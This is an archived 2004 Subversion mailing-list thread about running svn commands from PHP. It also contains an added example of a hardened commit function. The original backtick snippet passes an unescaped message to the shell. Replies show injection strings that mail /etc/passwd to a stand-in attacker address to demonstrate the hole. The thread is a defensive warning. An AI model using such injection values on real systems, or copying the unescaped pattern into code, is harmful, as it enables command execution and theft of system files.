Posted to users@subversion.apache.org by "Simmons, Bryan" <bs...@gpworldwide.com> on 2004/02/11 20:58:15 UTC

PHP hack under way

Ok, so I went ahead and took the easiest approach I could:  svn client
commands in php.
The kinks have not all been worked out for my php portal but I did find
a way to successfully
push revisions to subversion through php.

I use the backtick operator.  Yep, it's that simple.  

$response = `svn commit -m \"$message\"`;

I have found that the $response is dead-on accurate in this case despite
warnings that the 
command line response may be garbled into binary.

Here's a question:  will svn add && svn commit work?


Regards,

Bryan Simmons
Network Systems Engineer
General Physics
410.379.3710
bsimmons@genphysics.com

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@subversion.tigris.org
For additional commands, e-mail: users-help@subversion.tigris.org


Re: PHP hack under way

Posted by Ben Collins-Sussman <su...@collab.net>.
On Wed, 2004-02-11 at 14:58, Simmons, Bryan wrote:

> I use the backtick operator.  Yep, it's that simple.  
> 
> $response = `svn commit -m \"$message\"`;
> 

By the way, I hear rumors that SWIG can produce real PHP bindings for the
Subversion C API.  People are already using SWIG to produce python,
perl, and java bindings.  That might be a better long-term approach.





Re: PHP hack under way

Posted by Florian Weimer <fw...@deneb.enyo.de>.
Brian W. Fitzpatrick wrote:

> > $response = `svn commit -m \"$message\"`;

> I don't know offhand, but I suspect that you may be opening up a
> security hole the size of Texas by doing this.  What if message is
> actually equal to 
> 
> "foo\" ; mail evilhaxor@example.com < /etc/passwd"
> 
> or something worse. 

With magic_quotes_gpc, this doesn't work, but

  $(mail evilhaxor@example.com < /etc/passwd)

probably does...

You could use escapeshellarg() and similar functions to preprocess the
argument, but I don't understand the C source code and still have an
uneasy feeling about them.

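The fix Florian points at, written out as an added example (not code from the thread or from Subversion's own PHP bindings): the untrusted message and path are passed through escapeshellarg() so that ";", "$(...)" and the '\"' trick quoted above reach /bin/sh as literal characters, and the "svn add && svn commit" sequence from the first post is run as two checked steps. The working-copy root, the svn binary being on PATH, and the unversioned check via "svn status" are assumptions.

```php
<?php
// Added example: commit a working-copy path from PHP without letting the
// caller's message or path reach the shell unquoted.
// Assumed: $wcRoot is the portal's working copy and svn is on PATH.

function svnCommitSafely(string $wcRoot, string $relPath, string $message): array
{
    // Resolve the path inside the working copy and reject anything that
    // escapes it or starts with '-' (svn would otherwise parse it as an option).
    $root = realpath($wcRoot);
    $abs  = realpath($wcRoot . '/' . $relPath);
    if ($root === false || $abs === false || $relPath === '' || $relPath[0] === '-'
        || strpos($abs, $root . '/') !== 0) {
        return ['ok' => false, 'out' => "rejected path: $relPath"];
    }

    // escapeshellarg() wraps the value in single quotes and escapes embedded
    // single quotes; inside single quotes /bin/sh does not interpret ";",
    // "$(...)", backticks or '\"', so the request data cannot end the command.
    $msgArg  = escapeshellarg($message);
    $pathArg = escapeshellarg($abs);

    // Only "svn add" a path that svn reports as unversioned ('?'), since add
    // fails on an already-versioned path.  (Assumed: status line format.)
    exec("svn status --non-interactive $pathArg 2>&1", $st, $code);
    $unversioned = ($code === 0 && isset($st[0]) && $st[0][0] === '?');

    // "svn add && svn commit": stop on the first failure; --non-interactive
    // keeps svn from blocking the web server on a prompt.
    $cmd = ($unversioned ? "svn add --non-interactive $pathArg 2>&1 && " : '')
         . "svn commit --non-interactive -m $msgArg $pathArg 2>&1";
    exec($cmd, $lines, $status);
    return ['ok' => $status === 0, 'out' => implode("\n", $lines)];
}

// With the message from the thread, the whole string becomes the log message
// and no mail command runs (constructed call; paths are placeholders).
$r = svnCommitSafely('/var/www/wc', 'docs/readme.txt',
                     'foo" ; mail evilhaxor@example.com < /etc/passwd');
echo $r['out'], "\n";
```

This quotes correctly only when the command really runs under a Bourne-style shell; the check that a path does not start with "-" is what keeps a request-supplied value from being read by svn as an option.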

Re: PHP hack under way

Posted by "Brian W. Fitzpatrick" <fi...@red-bean.com>.
On Wed, 2004-02-11 at 14:58, Simmons, Bryan wrote:
> Ok, so I went ahead and took the easiest approach I could:  svn client
> commands in php.
> The kinks have not all been worked out for my php portal but I did find
> a way to successfully
> push revisions to subversion through php.
> 
> I use the backtick operator.  Yep, it's that simple.  
> 
> $response = `svn commit -m \"$message\"`;
> 
> I have found that the $response is dead-on accurate in this case despite
> warnings that the 
> command line response may be garbled into binary.
> 
> Here's a question:  will svn add && svn commit work?

I don't know offhand, but I suspect that you may be opening up a
security hole the size of Texas by doing this.  What if message is
actually equal to 

"foo\" ; mail evilhaxor@example.com < /etc/passwd"

or something worse. 

Just a little something to think about.

-Fitz

